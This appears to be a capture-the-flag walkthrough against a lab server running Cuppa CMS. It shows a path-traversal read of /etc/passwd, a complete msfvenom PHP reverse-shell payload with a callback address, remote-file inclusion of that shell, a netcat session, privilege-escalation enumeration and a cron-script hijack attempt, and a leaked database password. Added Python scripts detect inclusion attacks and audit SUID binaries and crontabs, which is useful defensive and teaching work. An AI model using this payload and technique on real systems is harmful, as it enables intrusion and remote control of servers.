curl -s --data-urlencode urlConfig=../../../../../../../../../../../etc/passwd http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?
http://10.10.37.103/45kra24zxs28v3yd/administrator/alertConfigField.php%20?urlConfig=/../../../../etc/passwd
WE READ /ETC/PASSWD VIA LFI:
http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../etc/passwd
RESULT:
Field configuration:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
WE TRY TO READ /ETC/SHADOW:
http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../etc/shadow
IT RETURNS NO INFO, SURELY BECAUSE WE DON'T HAVE PRIVILEGES.
----
┌──(root㉿kali)-[~]
└─# curl -s --data-urlencode urlConfig=../../../../../../../../../../../etc/passwd http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?
<script>
function CloseDefaultAlert(){
SetAlert(false, "", "#alert");
setTimeout(function () {SetBlockade(false)}, 200);
}
function ShowAlert(){
_width = '';
_height = '';
jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
function CompleteAnimation(){
jQuery("#btnClose_alert").css('visibility', "visible");
jQuery("#description_alert").css('visibility', "visible");
jQuery("#content_alert").css('visibility', "visible");
}
}
</script>
<div class="alert_config_field" id="alert" style="z-index:;">
<div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div>
<div class="description_alert" id="description_alert"><b>Field configuration: </b></div>
<div class="separator" style="margin-bottom:15px;"></div>
<div id="content_alert" class="content_alert">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
</div>
</div>
---------- WE TRY TO MOVE ON TO AN RFI TO INCLUDE OUR REVERSE SHELL FILE, WHICH WE CREATED WITH MSFVENOM USING OUR IP AND PORT: --------------------------------------------------
MSFVENOM:
┌──(root㉿kali)-[~]
└─# msfvenom -p php/reverse_php LHOST=10.10.76.203 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3046 bytes
/*<?php /**/
@error_reporting(0);
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
$dis=preg_replace('/[, ]+/', ',', $dis);
$dis=explode(',', $dis);
$dis=array_map('trim', $dis);
}else{
$dis=array();
}
$ipaddr='10.10.76.203';
$port=4444;
if(!function_exists('eiMIFOUfpKRJ')){
function eiMIFOUfpKRJ($c){
global $dis;
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$c=$c." 2>&1\n";
}
$AOXWF='is_callable';
$KNHExnS='in_array';
if($AOXWF('proc_open')and!$KNHExnS('proc_open',$dis)){
$handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
$o=NULL;
while(!feof($pipes[1])){
$o.=fread($pipes[1],1024);
}
@proc_close($handle);
}else
if($AOXWF('exec')and!$KNHExnS('exec',$dis)){
$o=array();
exec($c,$o);
$o=join(chr(10),$o).chr(10);
}else
if($AOXWF('popen')and!$KNHExnS('popen',$dis)){
$fp=popen($c,'r');
$o=NULL;
if(is_resource($fp)){
while(!feof($fp)){
$o.=fread($fp,1024);
}
}
@pclose($fp);
}else
if($AOXWF('system')and!$KNHExnS('system',$dis)){
ob_start();
system($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($AOXWF('passthru')and!$KNHExnS('passthru',$dis)){
ob_start();
passthru($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($AOXWF('shell_exec')and!$KNHExnS('shell_exec',$dis)){
$o=shell_exec($c);
}else
{
$o=0;
}
return $o;
}
}
$nofuncs='no exec functions';
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
$s=@fsockopen("tcp://10.10.76.203",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=eiMIFOUfpKRJ(substr($c,0,-1));
if($out===false){
fwrite($s,$nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
}else{
$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
@socket_connect($s,$ipaddr,$port);
@socket_write($s,"socket_create");
while($c=@socket_read($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=eiMIFOUfpKRJ(substr($c,0,-1));
if($out===false){
@socket_write($s,$nofuncs);
break;
}
}
@socket_write($s,$out,strlen($out));
}
@socket_close($s);
}
PYTHON SERVER SERVING MY FILE SO IT CAN BE PULLED THROUGH THE CUPPA SERVICE'S VULNERABLE URL:
┌──(root㉿kali)-[~]
└─# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
URL TO INCLUDE OUR REVERSE SHELL FILE INTO CUPPA; IT RUNS THE INSTANT THE REQUEST IS SENT, WITH OUR NETCAT LISTENER ALREADY WAITING:
http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.76.203:8080/shell.php
BINGO, IT WORKED, WE CATCH THE REVERSE CONNECTION FROM OUR shell.php LOADED INTO CUPPA THROUGH THE RFI VULNERABILITY:
:D
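From the defender's side, both requests made against alertConfigField.php in these notes leave unmistakable traces in the web server's access log: a `../` traversal reaching /etc/passwd (the LFI above) and an `http://` URL pointing at an outside host in the same `urlConfig` parameter (the RFI just used). The Python below is an added example, not part of these notes or of Cuppa CMS; it assumes Apache combined-log format, and the sample lines are constructed to mirror the requests from this walkthrough (the two 192.168.1.x client lines are made-up benign traffic). It goes a little beyond the page by checking every query parameter, not only `urlConfig`, and by decoding percent-encoded values before matching.

```python
"""Flag file-inclusion attempts (LFI traversal / RFI remote URL) in web access logs.

Added example. Assumes Apache 'combined' log format; the sample lines below are
constructed to mirror the requests made in these notes and are not real logs.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log: host ident user [time] "METHOD target HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

TRAVERSAL_RE = re.compile(r"(?:\.\./|\.\.\\)")          # ../ or ..\ after decoding
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)     # value is a remote URL
SENSITIVE = ("/etc/passwd", "/etc/shadow")             # absolute paths seen in these notes

# Constructed sample lines: the first three replay the walkthrough's requests as the
# target's Apache would have logged them; the last two are ordinary traffic.
SAMPLE_LOG = """\
10.10.76.203 - - [03/Feb/2024:18:20:01 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../etc/passwd HTTP/1.1" 200 2315 "-" "curl/8.5.0"
10.10.76.203 - - [03/Feb/2024:18:21:10 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.10.76.203 - - [03/Feb/2024:18:25:42 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.76.203:8080/shell.php HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
192.168.1.20 - - [03/Feb/2024:18:26:00 +0000] "GET /45kra24zxs28v3yd/index.html HTTP/1.1" 200 418 "-" "Mozilla/5.0"
192.168.1.21 - - [03/Feb/2024:18:27:00 +0000] "POST /squirrelmail/src/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def classify_value(value: str) -> Optional[str]:
    """Return 'lfi', 'rfi' or None for one query-parameter value."""
    decoded = unquote(unquote(value))   # tolerate double-encoded payloads
    if REMOTE_RE.match(decoded):
        return "rfi"
    if TRAVERSAL_RE.search(decoded) or any(s in decoded for s in SENSITIVE):
        return "lfi"
    return None


def scan_log(log_text: str) -> List[Dict]:
    """Parse each line and report requests whose query carries an inclusion payload."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not in combined format; skip rather than guess
        parts = urlsplit(m.group("target"))
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "path": parts.path,
                    "param": key,
                    "kind": kind,
                    "status": int(m.group("status")),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['kind'].upper():3} {f['ip']} {f['path']} param={f['param']} (HTTP {f['status']})")
```

A 200 status on a flagged request is the important signal: the application served the included content rather than rejecting it. The same checks belong in the application itself, which should resolve `urlConfig` against a fixed directory and refuse anything containing a scheme or `..`.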
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.76.203] from (UNKNOWN) [10.10.37.103] 40220
whoami
www-data
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
WE GOT THE USER FLAG FOR MILESDYSON; STILL GOING WELL:
ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
pwd
/var/www/html/45kra24zxs28v3yd/administrator/alerts
cd ..
cd ..
cd ..
ls
45kra24zxs28v3yd
admin
ai
config
css
image.png
index.html
js
style.css
pwd
/var/www/html
cd ..
pwd
/var/www
ls
html
cd ..
ls
backups
cache
crash
lib
local
lock
log
mail
opt
run
snap
spool
tmp
www
cd ..
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd home
ls
milesdyson
cd mylesdyson
ls
milesdyson
pwd
/home
cd milesdyson
ls
backups
mail
share
user.txt
cat user.txt
7ce5c2109a40f958099283600a9ae807
------------------- PRIVILEGE ESCALATION --------------------------
NOW LET'S GO FOR ROOT:
WE LOOK AT THE BINARIES WITH THE SUID BIT:
find / -type f -perm -04000 -ls 2>/dev/null
279429 36 -rwsr-xr-x 1 root root 35600 Mar 6 2017 /sbin/mount.cifs
260157 40 -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
277101 32 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
260206 28 -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
260171 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
260188 40 -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
260172 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
260602 56 -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
264411 136 -rwsr-xr-x 1 root root 136808 Jun 10 2019 /usr/bin/sudo
260591 40 -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
260525 76 -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
292080 24 -rwsr-xr-x 1 root root 23376 Mar 27 2019 /usr/bin/pkexec
260464 40 -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
277225 36 -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
279238 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
277224 36 -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
260462 52 -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
260424 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
277205 40 -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
292076 16 -rwsr-xr-x 1 root root 14864 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
260788 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
279893 100 -rwsr-sr-x 1 root root 98472 Mar 18 2019 /usr/lib/snapd/snap-confine
277718 420 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /usr/lib/openssh/ssh-keysign
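A defender reviewing a listing like the one above wants to know which entries are unexpected, not just that SUID binaries exist. The following Python is an added example, not part of these notes: it parses `find -ls` output (a subset of the lines above, embedded as the sample) and compares it against an assumed allow-list that an administrator would maintain for the host image, flagging binaries that are not on the list, not owned by root, or both setuid and setgid.

```python
"""Review `find / -perm -4000 -ls` output against a baseline of expected SUID binaries.

Added example. SAMPLE_FIND_LS is a subset of the listing captured on the target in
these notes; BASELINE is an assumed allow-list, not something from the host itself.
"""
from typing import Dict, List, Set

SAMPLE_FIND_LS = """\
279429 36 -rwsr-xr-x 1 root root 35600 Mar 6 2017 /sbin/mount.cifs
260157 40 -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
260188 40 -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
260602 56 -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
264411 136 -rwsr-xr-x 1 root root 136808 Jun 10 2019 /usr/bin/sudo
292080 24 -rwsr-xr-x 1 root root 23376 Mar 27 2019 /usr/bin/pkexec
279238 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
279893 100 -rwsr-sr-x 1 root root 98472 Mar 18 2019 /usr/lib/snapd/snap-confine
277718 420 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /usr/lib/openssh/ssh-keysign
"""

# Assumed allow-list: the SUID binaries an administrator expects on this image.
BASELINE: Set[str] = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/lib/openssh/ssh-keysign",
}


def parse_find_ls(text: str) -> List[Dict]:
    """Parse `find -ls` lines: inode blocks perms links owner group size mon day year path."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 10)      # path is the 11th field and may contain spaces
        if len(parts) < 11:
            continue
        perms, owner, group, size, path = parts[2], parts[4], parts[5], int(parts[6]), parts[10]
        entries.append({
            "path": path, "perms": perms, "owner": owner, "group": group, "size": size,
            "setuid": perms[3] in "sS",   # 's'/'S' in the owner-execute slot
            "setgid": perms[6] in "sS",   # 's'/'S' in the group-execute slot
        })
    return entries


def review_suid(text: str, baseline: Set[str]) -> List[Dict]:
    """Return entries that deviate from the baseline, with the reasons."""
    findings = []
    for e in parse_find_ls(text):
        reasons = []
        if e["path"] not in baseline:
            reasons.append("not in baseline")
        if e["owner"] != "root":
            reasons.append(f"owned by {e['owner']}")
        if e["setuid"] and e["setgid"]:
            reasons.append("setuid and setgid")
        if reasons:
            findings.append({**e, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review_suid(SAMPLE_FIND_LS, BASELINE):
        print(f"[!] {f['path']} ({f['perms']} {f['owner']}:{f['group']}): {', '.join(f['reasons'])}")
```

Run periodically and diffed against the previous run, this turns a noisy enumeration command into a drift check: a newly appeared SUID file, or a change of owner on an existing one, shows up as a single line.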
-----------------
WE LOOK AT THE ENVIRONMENT VARIABLES:
env
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/45kra24zxs28v3yd/administrator/alerts
--------------
WE LOOK AT THE SCHEDULED TASKS, THE CRONJOBS:
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
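The entry `*/1 * * * * root /home/milesdyson/backups/backup.sh` is the misconfiguration that matters here: a job that runs as root every minute from a path inside an ordinary user's home directory. The following Python is an added audit script, not part of these notes: it parses system-crontab text (the /etc/crontab above, embedded as the sample), reports root jobs whose command points outside the system directories, and, when the path exists on the machine it runs on, checks whether the script or its directory is writable by someone other than root.

```python
"""Audit /etc/crontab-style files for root jobs that run from user-controlled paths.

Added example. SAMPLE_CRONTAB is the /etc/crontab read on the target in these notes;
the writability probe only runs when the path exists on the local machine.
"""
import os
import shlex
import stat
from typing import Dict, List, Optional

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
"""

# Directories a root cron job may legitimately execute from (assumed policy).
TRUSTED_PREFIXES = ("/bin/", "/sbin/", "/usr/", "/etc/", "/opt/", "/lib/")


def parse_system_crontab(text: str) -> List[Dict]:
    """Parse system-crontab lines (5 time fields, user, command); skip comments and VAR=value."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        jobs.append({"schedule": " ".join(fields[:5]), "user": fields[5], "command": fields[6]})
    return jobs


def script_paths(command: str) -> List[str]:
    """Absolute paths referenced by a command line (the things cron will actually run)."""
    try:
        tokens = shlex.split(command)
    except ValueError:                    # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/") and len(t) > 1]


def writable_by_non_root(path: str) -> Optional[bool]:
    """True if the path (or, if absent, its directory) is non-root-owned or group/world-writable.

    Returns None when neither exists on this machine, so offline analysis stays honest.
    """
    probe = path if os.path.exists(path) else os.path.dirname(path)
    if not os.path.exists(probe):
        return None
    st = os.stat(probe)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(text: str) -> List[Dict]:
    """Return root jobs that execute something outside the trusted system prefixes."""
    findings = []
    for job in parse_system_crontab(text):
        if job["user"] != "root":
            continue
        for path in script_paths(job["command"]):
            if not path.startswith(TRUSTED_PREFIXES):
                findings.append({**job, "path": path, "writable": writable_by_non_root(path)})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CRONTAB):
        print(f"[!] root job '{f['schedule']}' runs {f['path']} (non-root writable: {f['writable']})")
```

The fix on the host side is the mirror image of the check: root-owned scripts in a root-owned, non-writable directory, and, for the user's backup, a job that runs as that user rather than as root.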
TRY TO GET THE CRONJOBS TO RUN THE FILE AS ROOT:
echo "/bin/bash" > backup.sh
-----------
WE LOOK AT THE CONFIGURATION.PHP FILE
pwd
/var/www/html/45kra24zxs28v3yd/administrator
cat Configuration.php
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "password123";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
WE LOOK AT THE WRITABLE DIRECTORIES:
find / -writable 2>/dev/null
/home/milesdyson/.bash_history
/tmp
/tmp/.Test-unix
/tmp/.ICE-unix
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/sys/kernel/security/apparmor/.null
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
/sys/fs/cgroup/memory/cgroup.event_control
/sys/fs/cgroup/memory/user.slice/cgroup.event_control
/sys/fs/cgroup/memory/init.scope/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dovecot.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-disk-by\x2duuid-354616bf\x2d923c\x2d43d3\x2da040\x2dae36babbbab3.swap/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
